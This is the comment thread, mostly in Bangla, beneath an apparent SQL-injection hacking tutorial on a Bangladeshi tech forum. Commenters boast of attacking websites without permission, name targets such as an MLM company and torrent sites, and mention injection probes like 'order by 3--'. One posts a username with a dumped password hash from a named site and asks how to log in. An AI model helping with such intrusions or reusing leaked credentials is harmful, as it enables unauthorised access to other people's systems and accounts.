আমার ব্যাক্তিগত একটা অভিজ্ঞতার কথা বলি, আমি জখন প্রথম প্রোগ্রামিং এর দিকে ঝুকলাম, তখন লাভালেয়ার স্ক্রিপ্ট দিয়ে একটি সামাজিক যোগাযোগ এর ওয়াপসাইট বানিয়েছিলাম। এত আনন্দ পেয়েছিলাম যে কয়েক রাত ঠিকমত ঘুমতে পারিনাই। বন্ধুদের জানালাম, তারা এসে জয়েন করলো।
একদিন ঘুম থেকে উঠে দেখি সাইট হ্যাকেড!! এত কস্ট করে বানানো ফোরাম টপিক, পোস্ট…… মেম্বার… কিচ্ছুই নেই।

    Level New

    যদি খারাপ দিকটাই আগে চিন্তা করি তাহলে ভালো কিছু করা সম্ভব নয়। আর আপনার সাইট হ্যাক হইসে হয়তো আপনার কোনো ত্রুটি ছিলো। ভালো + মন্দ এই দুইটি দিক সব কিছু তেই আছে। এখন যে যেটা বেছে নেই।

Level 0

OSADHARON AK TUNE DEKHLAM.@ALL TUNER VAIERA, + hacker hote ki ki jante hobe? Plz sbay aktu aawaj din!

    Level New

    ব্রেইন আর কিছু না 😛

দারুন বস!!! খুবই ভালো লাগলো। চালিয়ে যান। আমরা আছি। অবশ্যই ইথিক্যাল হ্যাকার হবার অপেক্ষায়। শুভ কামনা রইলো। ভালো থাকুন সবসময়। ভালোবাসায়..বন্ধনে।

    Level New

    ধন্যবাদ রুপালি গিটার ভাই। চালিয়ে যাবার চেস্টা করবো।

Level 2

ফাটাফাটি টিউন। অনেক ভালো লাগলো। অনেকদিন পর টিউন পরে মজা পেলাম। এখন বাংলার দামাল ছেলেরা চাইলেই যে কোন ওয়েব সাইট হ্যাক করতে পারে ভাবতেই ভালো লাগে। শুভ কামনা রইলো।ভালো থাকুন। ধন্যবাদ আপনাকে এবং বাংলাদেশ সাইবার আর্মিকে।

    Level New

    আপনাকেও ধন্যবাদ জাবেদ ভাই। 😉

অসাধারন টিউন অনেক সুন্দর লিখেছেন,
আপনাকে অসংখ্য ধন্যবাদ সুন্দর টিউনটির জন্য।
**কেউ দয়া করে এই সবের অপব্যবহার করবেন্না**

    Level New

    আপনার কমেন্ট এর আশায় ছিলাম। ধন্যবাদ আপনাকে 😀

আগে তোমাকে ৫০ পয়সা জরিমানা করলাম।কারণ এই হ্যাকিং এর ভূতটি বেশ কিছুদিন হলো মাথা থেকে চলে গিয়েছিলো কিন্তু এত সুন্দর টিউন দেখে আর নিজেকে সামলাতে পারলাম না।কিন্তু এখন পর্যন্ত ২০ ওয়েবসাইটের হামলা চালাইলাম কিন্তু সফল হইলাম না 🙁 🙁 আমি কি অদ্যও সফল হবো?

    Level New

    জরিমানার অংক দেখেতো ভয় পেয়ে গেলাম 😛 হা অবশ্যই সফল হবেন। পরের পর্বে লিখবো কিভাবে সফল হতে পারবেন । 😀 আর ধন্যবাদ আপনাকে কমেন্ট করার জন্য।

Level New

টিউন তো নয় তো আগুনের গোলারে, টিউন তো নয় তো আগুনের গোলা । Script Kiddie কে করলাম প্রিয়। ………………

আমার খুব আশা, আমি হ্যাকিং শিখতে পারব তো। বহুত চেষ্টা করছি কোনটা সফল হয়নাই।
এবার সফল হব তো?

    Level New

    চেস্টা করলে তো সফল হওয়ার কথা। 😀

Level 0

ভাই দারুন একটা টিউন দিলেন। আপনাকে কমেন্ট না করলে অন্যায় হয়ে যায় তাই বাধ্য হয়ে রেজি: করলাম এখানে।
আশা করি আরো অনেক কিছু পাবো আপনার কাছ থেকে।

    Level New

    হাহা আপনাকে ধন্যবাদ কমেন্ট করার জন্য।

খুব সুন্দর টিউন । সুন্দর উপস্থাপনা। ধন্যবাদ হ্যাকার সাহেব কে

    Level New

    আপনাকেও ধন্যবাদ সাদিক ভাই।

Level 2

Script Kiddie@ ami apna k nia proud fill kortase je amra o pari bairer jekono country sathe palla dea jitte

Level 0

bai apnar tune coment na korle moha onnay hoye jabe, tai na lore parlam na

avro install thakar por-o bangla likhte pari na

Level 0

bai ami akta MLM companir website hack korte cai. jara manusher sathe batpari kore kuti kuti taka hatiye nicche.

ba ba re ato kicu

Level 0

এডমিন টেবিল থেকে ইউজার এবং পাসওয়ার্ড বের করার নিয়ম :-

এর আগে সব পারসি কিন্তু পরে র পারি নাই।

DORK আসলে জানিনা জানাবেন কেউ।ইচ্ছা আসে সিল কিন্তু এখন ও পারি না কিছু করতে

Level 0

মামু, আমি হার্ট এ্যটাক করমু । টিটিতে আগুন ধরাই দিলেন। আরো চাই ।

ভাই password পাইসি…কিন্তু যেসব সাইট login এ করা জযায় না ওইসব সাইট login এ করব কেমনে ??????? …..ektu bolen plzzzzzzzzzzZZZZZZZZZZZZZ

Level 0

vaia akdom last step par howar por to amar eirokom dekhacche……..(amin ar pass jekhane dekhanor kotha)……ar jodi password pai..tahole tarpor login korbo kotha theke??? tar to kono jayga dekhtesi na…

VecDiana$:4f3120624f28e5d8e21d4d3cc1a030b38a2e747347f287ea1fa9089cc593137e

Level 0

Thanks. Script Kiddie

প্লিজ, চেইন টিউন চালিয়ে যান। আমিও হ্যাকিং শিখতে চাই এবং ব্যাসিক সম্পর্কে একটু জ্ঞান আছে। তবে ওয়েব হ্যাকিং সম্পর্কে আমি জানতাম না, এখন মনে হয় আপনার এই পদ্ধতি ট্রাই দেয়া লাগে।

ভাই, আপনার SparkleAppeal সাইটের পাস পর্যন্ত গিয়েছি। এখন সমস্যা দুইটঃ
১। কোনটা ইউজারনেম কোনটা পাস বুঝতে পারছি না। পাস দেখাচ্ছে এরকমঃ VecDiana$:4f3120624f28e5d8e21d4d3cc1a030b38a2e747347f287ea1fa9089cc593137e
২। ওয়েবসাইটটি যদি(যদি) হ্যাক করতে চাই, তাহলে লগিন করব কোথা থেকে?

Level 0

টিউন টা প্রিয়তে নিলাম

Level 0

Boss এটা দিয়ে যে কোনো বাংলা torrent সাইট হ্যাক করা যাবে…………

Level 0

Thankxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx guru, josh ekta tune………………………………………………………………………………………………

vai where are you?

এক কথায় ফাটিয়া দিয়েছেন গুরু। আমি টিকটিউনস্ নতুন আমার প্রথম কমমেন্ট আপনার এ পোস্ট টা দিয়ে শুরু করলাম …………..

vai aro new new chain tunes koren hacking er upore amader shobar onek kaje lagbe… @ Script Kiddie

টিউনটা ভালো লাগলো, নিজের সাইটকে প্রথমে হ্যাক করার চেষ্টা করে দেখলাম, কিন্তু ‘ string দেবার পর error ছাড়া পরের ধাপে আর যাচ্ছেনা, মানে order by 3– এভাবে অনেক চেষ্টা করে কোন error পেলাম না। অথচ যেহেতু আমার নিজের সাইট টেবিলের সঠিক কলাম নাম্বার আমার জানা আছে। দয়া করে জানাবেন কেন আর আগাতে পারছিনা?

Level 0

1ne of the b2st tun1

ore bap re!!!!ki deklam !
osthir tune….

Level 0

Very Very Nice

but how to check Vulnerablelaty and protech wordpress site …

অসাম টিউন…

ধন্যবাদ!…

md5 hash code generate korbo kivabe?